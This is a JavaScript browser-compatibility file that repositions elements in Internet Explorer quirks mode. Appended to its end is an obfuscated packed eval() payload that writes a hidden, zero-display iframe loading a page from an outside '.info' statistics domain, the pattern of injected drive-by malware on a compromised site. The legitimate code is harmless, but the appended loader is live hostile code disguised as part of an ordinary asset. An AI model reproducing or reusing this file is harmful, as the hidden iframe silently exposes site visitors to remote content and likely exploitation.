/******************************************************************************
* isoQuirksModeHack.js
*******************************************************************************

*******************************************************************************
*                                                                             *
* Copyright 2008
*                                                                             *
******************************************************************************/

function isoHackPosition()
{
	if (	window.document.compatMode &&
				window.document.compatMode == "BackCompat" &&
				window.document.body != null &&
				window.navigator &&
				window.navigator.appName &&
				window.navigator.appName == "Microsoft Internet Explorer"	)
	{
		var els = document.body.getElementsByTagName("*");
    var elsLen = els.length;
    var pattern = new RegExp("(^|\\s)isoBlockPosition-(left|center|right)(\\s|$)");
		var c = new Array();
    for (var i=0,j=0;i<elsLen;i++)
		{
			var e = els[i];
			var tagName = e.tagName.toUpperCase();
			if ( tagName == "FORM" ||
					 tagName == "CAPTION" )
					 continue;
			var m = e.className.match(pattern);
			if (m != null)		
				c[j++] = {"e":e,"a":m[2]};
		}
		for (var i=0;i<j;i++)
		{
			var m = c[i];
			var e = m.e;
			e.style.textAlign = e.currentStyle.textAlign;
			var div = window.document.createElement("div");
			div.style.textAlign = m.a;
			var p = e.parentNode;
			p.insertBefore(div,e).appendChild(p.removeChild(e));
		}
	}
}
addLoadAction(isoHackPosition);<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{}));
<!-- . -->